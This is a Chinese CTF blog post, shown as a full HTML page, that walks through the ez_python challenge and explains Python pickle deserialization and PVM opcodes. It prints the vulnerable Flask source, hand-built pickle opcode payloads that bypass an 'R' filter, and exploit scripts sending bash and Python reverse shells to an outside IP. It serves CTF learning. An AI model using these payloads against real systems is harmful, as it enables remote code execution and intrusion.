<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="笔记">
<meta property="og:type" content="article">
<meta property="og:title" content="python 反序列化">
<meta property="og:url" content="http://example.com/2021/10/20/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="staryのblog">
<meta property="og:description" content="笔记">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2021-10-19T16:00:00.000Z">
<meta property="article:modified_time" content="2021-11-16T07:12:42.253Z">
<meta property="article:author" content="stary">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2021/10/20/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>python 反序列化 | staryのblog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">staryのblog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">我不能送你最后一程了</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/10/20/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/D6C0CCF9F70347CF46810729EAC3C281.png">
      <meta itemprop="name" content="stary">
      <meta itemprop="description" content="CTFer">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="staryのblog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          python 反序列化
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2021-10-20 00:00:00" itemprop="dateCreated datePublished" datetime="2021-10-20T00:00:00+08:00">2021-10-20</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2021-11-16 15:12:42" itemprop="dateModified" datetime="2021-11-16T15:12:42+08:00">2021-11-16</time>
              </span>

          
            <div class="post-description">笔记</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="长城杯ez-python复盘"><a href="#长城杯ez-python复盘" class="headerlink" title="长城杯ez_python复盘"></a>长城杯ez_python复盘</h1><p>就看了一题 md网刃和极客都没做，亏</p>
<p>先解题放payload</p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7436#toc-7">pickle反序列化初探 - 先知社区 (aliyun.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/EddieIvan01/pker">https://github.com/EddieIvan01/pker</a></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/361349643">pickle反序列化的利用技巧总结 – 知乎 (zhihu.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/wjrblogs/p/14057784.html">Python 反序列化漏洞学习笔记 – 1ndex- – 博客园 (cnblogs.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7436">pickle反序列化初探 – 先知社区 (aliyun.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/CSDNiamcoming/article/details/119284636">(28条消息) 极客巅峰2021 web opcode_y0un9er-CSDN博客</a></p>
<h2 id="ez-python"><a href="#ez-python" class="headerlink" title="ez_python"></a>ez_python</h2><p>pic处可以读源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line">import pickle</span><br><span class="line">import base64</span><br><span class="line">from flask import Flask, request</span><br><span class="line">from flask import render_template,redirect,send_from_directory</span><br><span class="line">import os</span><br><span class="line">import requests</span><br><span class="line">import random</span><br><span class="line">from flask import send_file</span><br><span class="line"></span><br><span class="line">app &#x3D; Flask(__name__)</span><br><span class="line"></span><br><span class="line">class User():</span><br><span class="line">    def __init__(self,name,age):</span><br><span class="line">        self.name &#x3D; name</span><br><span class="line">        self.age &#x3D; age</span><br><span class="line"></span><br><span class="line">def check(s):</span><br><span class="line">    if b&#39;R&#39; in s:</span><br><span class="line">        return 0</span><br><span class="line">    return 1</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.route(&quot;&#x2F;&quot;)</span><br><span class="line">def index():</span><br><span class="line">    try:</span><br><span class="line">        user &#x3D; base64.b64decode(request.cookies.get(&#39;user&#39;))</span><br><span class="line">        if check(user):</span><br><span class="line">            user &#x3D; pickle.loads(user)</span><br><span class="line">            username &#x3D; user[&quot;username&quot;]</span><br><span class="line">        else:</span><br><span class="line">            username &#x3D; &quot;bad,bad,hacker&quot;</span><br><span class="line">    except:</span><br><span class="line">        username &#x3D; &quot;CTFer&quot;</span><br><span class="line">    pic &#x3D; &#39;&#123;0&#125;.jpg&#39;.format(random.randint(1,7))</span><br><span class="line">    </span><br><span class="line">    try:</span><br><span class="line">        pic&#x3D;request.args.get(&#39;pic&#39;)</span><br><span class="line">        with open(pic, &#39;rb&#39;) as f:</span><br><span class="line">            base64_data &#x3D; base64.b64encode(f.read())</span><br><span class="line">            p &#x3D; base64_data.decode()</span><br><span class="line">    except:</span><br><span class="line">        pic&#x3D;&#39;&#123;0&#125;.jpg&#39;.format(random.randint(1,7))</span><br><span class="line">        with open(pic, &#39;rb&#39;) as f:</span><br><span class="line">            base64_data &#x3D; base64.b64encode(f.read())</span><br><span class="line">            p &#x3D; base64_data.decode()</span><br><span class="line"></span><br><span class="line">    return render_template(&#39;index.html&#39;, uname&#x3D;username, pic&#x3D;p )</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ &#x3D;&#x3D; &quot;__main__&quot;:</span><br><span class="line">    app.run(&#39;0.0.0.0&#39;,port&#x3D;5000)</span><br></pre></td></tr></table></figure>
<p>序列化字符串中不能存在 R，而 <strong>reduce</strong> 就是用到了R指令，不过也毫不意外，毕竟题目提示的就是要手写 opcode，在不使用 R 指令的情况下执行命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">bash -c &quot;bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;39.108.125.165&#x2F;11100 0&gt;&amp;1&quot;</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;www.jackson-t.ca&#x2F;runtime-exec-payloads.html&#x2F;&#x2F;编码网站</span><br><span class="line"></span><br><span class="line">bash -c &#123;echo,YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDguMTI1LjE2NS8xMTEwMCAwPiYxIg&#x3D;&#x3D;&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;</span><br></pre></td></tr></table></figure>
<p>RCE demo:</p>
<p>R:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">b&#39;&#39;&#39;cos</span><br><span class="line">system</span><br><span class="line">(S&#39;whoami&#39;</span><br><span class="line">tR.&#39;&#39;&#39;</span><br></pre></td></tr></table></figure>
<p>i</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">b&#39;&#39;&#39;(S&#39;whoami&#39;</span><br><span class="line">ios</span><br><span class="line">system</span><br><span class="line">.&#39;&#39;&#39;</span><br></pre></td></tr></table></figure>
<p>o</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">b&#39;&#39;&#39;(cos</span><br><span class="line">system</span><br><span class="line">S&#39;whoami&#39;</span><br><span class="line">o.&#39;&#39;&#39;</span><br></pre></td></tr></table></figure>
<p>选一个没有b’R’的</p>
<p>exp:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">import base64</span><br><span class="line">import pickletools</span><br><span class="line"></span><br><span class="line">a &#x3D; b&#39;&#39;&#39;(S&#39;bash -c &quot;bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;39.108.125.165&#x2F;11100 0&gt;&amp;1&quot;&#39;</span><br><span class="line">ios</span><br><span class="line">system</span><br><span class="line">.&#39;&#39;&#39;</span><br><span class="line"></span><br><span class="line">a &#x3D; pickletools.optimize(a)</span><br><span class="line">print(base64.b64encode(a))</span><br></pre></td></tr></table></figure>
<p>无过滤</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">#!&#x2F;usr&#x2F;bin&#x2F;env python3</span><br><span class="line">import requests</span><br><span class="line">import pickle</span><br><span class="line">import os</span><br><span class="line">import base64</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class exp(object):</span><br><span class="line">    def __reduce__(self):</span><br><span class="line">        s &#x3D; &quot;&quot;&quot;python -c &#39;import socket,subprocess,os;s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;172.17.0.1&quot;,8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p&#x3D;subprocess.call([&quot;&#x2F;bin&#x2F;bash&quot;,&quot;-i&quot;]);&#39;&quot;&quot;&quot;</span><br><span class="line">        return (os.system, (s,))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">e &#x3D; exp()</span><br><span class="line">s &#x3D; pickle.dumps(e)</span><br><span class="line"></span><br><span class="line">response &#x3D; requests.get(&quot;http:&#x2F;&#x2F;172.19.0.2:8000&#x2F;&quot;, cookies&#x3D;dict(</span><br><span class="line">    user&#x3D;base64.b64encode(s).decode()</span><br><span class="line">))</span><br><span class="line"></span><br><span class="line">print(response.content)</span><br></pre></td></tr></table></figure>
<p>草草草我怎么这么菜？？？？？我居然找不到opcode的，，呜呜呜我连百度都不会</p>
<h2 id="Python-的序列化和反序列化是什么"><a href="#Python-的序列化和反序列化是什么" class="headerlink" title="Python 的序列化和反序列化是什么"></a><strong>Python 的序列化和反序列化是什么</strong></h2><p>Python 的序列化和反序列化是将一个类对象向字节流转化从而进行存储和传输，然后使用的时候再将字节流转化回原始的对象的一个过程。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">import pickle</span><br><span class="line">class People(object):</span><br><span class="line">    def __init__(self,name &#x3D; &quot;K0rz3n&quot;):</span><br><span class="line">        self.name &#x3D; name</span><br><span class="line"></span><br><span class="line">    def say(self):</span><br><span class="line">        print (&quot;Hello ! My friends&quot;)</span><br><span class="line"></span><br><span class="line">a&#x3D;People()</span><br><span class="line">c&#x3D;pickle.dumps(a)</span><br><span class="line">print (c)</span><br><span class="line"></span><br><span class="line">#output:b&#39;\x80\x04\x95.\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x06People\x94\x93\x94)\x81\x94&#125;\x94\x8c\x04name\x94\x8c\x06K0rz3n\x94sb.&#39;</span><br><span class="line">import pickle</span><br><span class="line">class People(object):</span><br><span class="line">    def __init__(self,name &#x3D; &quot;K0rz3n&quot;):</span><br><span class="line">        self.name &#x3D; name</span><br><span class="line"></span><br><span class="line">    def say(self):</span><br><span class="line">        print (&quot;Hello ! My friends&quot;)</span><br><span class="line"></span><br><span class="line">a&#x3D;People()</span><br><span class="line">c&#x3D;pickle.dumps(a)</span><br><span class="line">d &#x3D; pickle.loads(c)</span><br><span class="line">print(type(d))</span><br><span class="line">d.say()</span><br><span class="line"># 可以看到，我们成功通过反序列化的方式恢复了之前我们序列化进去的类对象并成功的执行了对象的方法</span><br><span class="line"># output:&lt;class &#39;__main__.People&#39;&gt;</span><br><span class="line"># Hello ! My friends</span><br><span class="line">import pickle</span><br><span class="line">class People(object):</span><br><span class="line">    def __init__(self,name &#x3D; &quot;K0rz3n&quot;):</span><br><span class="line">        self.name &#x3D; name</span><br><span class="line"></span><br><span class="line">    def say(self):</span><br><span class="line">        print (&quot;Hello ! My friends&quot;)</span><br><span class="line"></span><br><span class="line">a&#x3D;People()</span><br><span class="line">c&#x3D;pickle.dumps(a)</span><br><span class="line">del People</span><br><span class="line">d &#x3D; pickle.loads(c)</span><br><span class="line"># 如果我在反序列化以前删除了 People</span><br><span class="line"># 这个类，那么我们在反序列化的过程中因为对象在当前的运行环境中没有找到这个类就会报错，从而反序列化失败。</span><br><span class="line"># nootput,die</span><br></pre></td></tr></table></figure>
<h2 id="为什么要实现序列化和反序列化"><a href="#为什么要实现序列化和反序列化" class="headerlink" title="为什么要实现序列化和反序列化"></a><strong>为什么要实现序列化和反序列化</strong></h2><p>和其他语言的序列化一样，Python 的序列化的目的也是为了保存、传递和恢复对象的方便性，在众多传递对象的方式中，序列化和反序列化可以说是最简单和最容易试下的方式</p>
<h2 id="python-是怎么实现序列化和反序列化的"><a href="#python-是怎么实现序列化和反序列化的" class="headerlink" title="python 是怎么实现序列化和反序列化的"></a><strong>python 是怎么实现序列化和反序列化的</strong></h2><h3 id="1-几个重要的函数"><a href="#1-几个重要的函数" class="headerlink" title="1.几个重要的函数"></a><strong>1.几个重要的函数</strong></h3><p>库 pickle 和 cPickle 后者更快</p>
<p><strong>序列化：</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pickle.dump(文件) </span><br><span class="line">pickle.dumps(字符串)</span><br></pre></td></tr></table></figure>
<p><strong>反序列化:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pickle.load(文件)</span><br><span class="line">pickle.loads(字符串)</span><br></pre></td></tr></table></figure>
<p>PVM(python 虚拟机)是实现 Python 序列化和反序列化的最根本的东西</p>
<h3 id="2-PVM-的组成"><a href="#2-PVM-的组成" class="headerlink" title="2.PVM 的组成"></a><strong>2.PVM 的组成</strong></h3><p>PVM 由三个部分组成，引擎（或者叫指令分析器），栈区、还有一个 Memo (作者也不知道怎么解释，我们姑且叫它 “标签区“)</p>
<h4 id="1-引擎的作用"><a href="#1-引擎的作用" class="headerlink" title="1.引擎的作用"></a><strong>1.引擎的作用</strong></h4><p>从头开始读取流中的操作码和参数，并对其进行处理,zai在这个过程中改变 栈区 和 标签区，处理结束后到达栈顶，形成并返回反序列化的对象</p>
<h4 id="2-栈区的作用"><a href="#2-栈区的作用" class="headerlink" title="2.栈区的作用"></a><strong>2.栈区的作用</strong></h4><p>作为流数据处理过程中的暂存区，在不断的进出栈过程中完成对数据流的反序列化，并最终在栈上生成发序列化的结果</p>
<h4 id="3-标签区的作用"><a href="#3-标签区的作用" class="headerlink" title="3.标签区的作用"></a><strong>3.标签区的作用</strong></h4><p>数据的一个索引或者标记</p>
<h3 id="3-PVM-操作码"><a href="#3-PVM-操作码" class="headerlink" title="3.PVM 操作码"></a><strong>3.PVM 操作码</strong></h3><p>图挂了草草草</p>
<p><strong>这里面要重点关注几个</strong></p>
<p>S : 后面跟的是字符串 ( ：作为命令执行到哪里的一个标记 t ：将从 t 到标记的全部元素组合成一个元祖，然后放入栈中 c ：定义模块名和类名（模块名和类名之间使用回车分隔） R ：从栈中取出可调用函数以及元祖形式的参数来执行，并把结果放回栈中 . ：点号是结束符</p>
<h3 id="4-反序列化流程"><a href="#4-反序列化流程" class="headerlink" title="4.反序列化流程"></a><strong>4.反序列化流程</strong></h3><p>序列化就是一个将对象转化成字符串的过程</p>
<p>我们将下面这个字符串存储为一个文件 shell.pickle</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">cos</span><br><span class="line">system</span><br><span class="line">(S&#39;&#x2F;bin&#x2F;sh&#39;</span><br><span class="line">tR.</span><br></pre></td></tr></table></figure>
<p>当我们使用下面这个函数对其进行加载的时候</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt; import pickle</span><br><span class="line">&gt;&gt;&gt; pickle.load(open(&#39;shell.pickle&#39;))</span><br><span class="line"></span><br><span class="line"># 这边失败了报了个typeerror 给的不是字节编码解析成str了</span><br></pre></td></tr></table></figure>
<p>解释如何执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">(1)c 后面是模块名，换行后是类名,于是将 os.system 放入栈中</span><br><span class="line">(2)( 这个是标记符，我们将一个 Mark 放入栈中</span><br><span class="line">(3)S 后面是字符串，我们放入栈中</span><br><span class="line">(4)t 将栈中 Mark 之前的内容取出来转化成元祖，再存入栈中 （’&#x2F;bin&#x2F;sh’,），同时标记 Mark 消失</span><br><span class="line">(5)R 将元祖取出，并将 callable 取出，然后将元祖作为 callable 的参数，并执行，对应这里就是 os.system(‘&#x2F;bin&#x2F;sh’),然后将结果再存入栈中</span><br></pre></td></tr></table></figure>
<h2 id="与-PHP-反序列化的对比"><a href="#与-PHP-反序列化的对比" class="headerlink" title="与 PHP 反序列化的对比"></a><strong>与 PHP 反序列化的对比</strong></h2><p>Python 除了能反序列化当前代码中出现的类(包括通过 import的方式引入的模块中的类)的对象以外，还能利用其彻底的面向对象的特性来反序列化使用 types 创建的匿名对象（这部分内容在后面会有所介绍），这样的话就大大拓宽了我们的攻击面。</p>
<h2 id="Python-反序列化漏洞何来"><a href="#Python-反序列化漏洞何来" class="headerlink" title="Python 反序列化漏洞何来"></a><strong>Python 反序列化漏洞何来</strong></h2><h3 id="我们怎么利用反序列化漏洞"><a href="#我们怎么利用反序列化漏洞" class="headerlink" title="我们怎么利用反序列化漏洞"></a><strong>我们怎么利用反序列化漏洞</strong></h3><h4 id="1-理论基础"><a href="#1-理论基础" class="headerlink" title="1.理论基础"></a><strong>1.理论基础</strong></h4><p><code>__reduce__</code> 这个魔法方法</p>
<p>当序列化以及反序列化的过程中中碰到一无所知的扩展类型(<strong>这里指的就是新式类</strong>)的时候，可以通过类中定义的<code>__reduce__</code>方法来告知如何进行序列化或者反序列化</p>
<p>只要在新式类中定义一个 <code>__reduce__</code> 方法，我们就能在序列化的使用让这个类根据我们在<code>__reduce__</code> 中指定的方式进行序列化</p>
<p>关键就在这个方法的返回值上，这个方法可以返回两种类型的值，String 和 tuple ,我们的构造点就在令其返回 tuple 的时候</p>
<p>当他返回值是一个元祖的时候，可以提供2到5个参数，我们重点利用的是前两个，第一个参数是一个callable object(可调用的对象)，第二个参数可以是一个元祖为这个可调用对象提供必要的参数，如果你认真看上面的 PVM 的指令码，你就会发现这个返回值和其中的一个 R 指令非常的一致，（我猜测这个 R 指令码就是这个 <code>__reduce__</code> 方法的返回值的底层实现 ）所以这过滤R就不能用reduce了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">import pickle</span><br><span class="line">import os</span><br><span class="line">class A(object):</span><br><span class="line">    def __reduce__(self):</span><br><span class="line">        a &#x3D; &#39;ping 127.0.0.1&#39;</span><br><span class="line">        return (os.system,(a,))</span><br><span class="line">a &#x3D; A()</span><br><span class="line">test &#x3D; pickle.dumps(a)</span><br><span class="line">pickle.loads(test)</span><br><span class="line"></span><br><span class="line"># output:执行的命令</span><br></pre></td></tr></table></figure>
<p>一个比较好的命令能执行 系统命令，那就是 python pty 模块</p>
<p>reduce 是利用调用某个 callable 并传递参数来执行的，而我们这个函数本身就是一个 callable</p>
<p>这时候就要利用我们上面分析的那个 PVM 操作码来自己构造了</p>
<p>这里也用到了 Python 的一个面向对象的特性，Python 能通过 types.FunctionTyle(func_code,globals(),’’)() 来动态地创建匿名函数，这一部分的内容可以看<a target="_blank" rel="noopener" href="https://docs.python.org/3/library/types.html">官方文档</a>的介绍</p>
<p><strong>这里直接给出 payload</strong></p>
<p>这是什么鬼。。。。？？？？</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">ctypes</span><br><span class="line">FunctionType</span><br><span class="line">(cmarshal</span><br><span class="line">loads</span><br><span class="line">(cbase64</span><br><span class="line">b64decode</span><br><span class="line">(S&#39;YwAAAAABAAAAAgAAAAMAAABzOwAAAGQBAGQAAGwAAH0AAIcAAGYBAGQCAIYAAIkAAGQDAEeIAABkBACDAQBHSHwAAGoBAGQFAIMBAAFkAABTKAYAAABOaf&#x2F;&#x2F;&#x2F;&#x2F;9jAQAAAAEAAAAEAAAAEwAAAHMsAAAAfAAAZAEAawEAchAAfAAAU4gAAHwAAGQBABiDAQCIAAB8AABkAgAYgwEAF1MoAwAAAE5pAQAAAGkCAAAAKAAAAAAoAQAAAHQBAAAAbigBAAAAdAMAAABmaWIoAAAAAHMHAAAAcGljNC5weVIBAAAABwAAAHMGAAAAAAEMAQQBcwkAAABmaWIoMTApID1pCgAAAHMHAAAAL2Jpbi9zaCgCAAAAdAIAAABvc3QGAAAAc3lzdGVtKAEAAABSAgAAACgAAAAAKAEAAABSAQAAAHMHAAAAcGljNC5weXQDAAAAZm9vBQAAAHMIAAAAAAEMAQ8EDwE&#x3D;&#39;</span><br><span class="line">tRtRc__builtin__</span><br><span class="line">globals</span><br><span class="line">(tRS&#39;&#39;</span><br><span class="line">tR(tR.</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/ctf/" rel="tag"># ctf</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/09/20/docker/" rel="prev" title="docker">
      <i class="fa fa-chevron-left"></i> docker
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/11/17/JAVA%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1/" rel="next" title="java 面向对象">
      java 面向对象 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
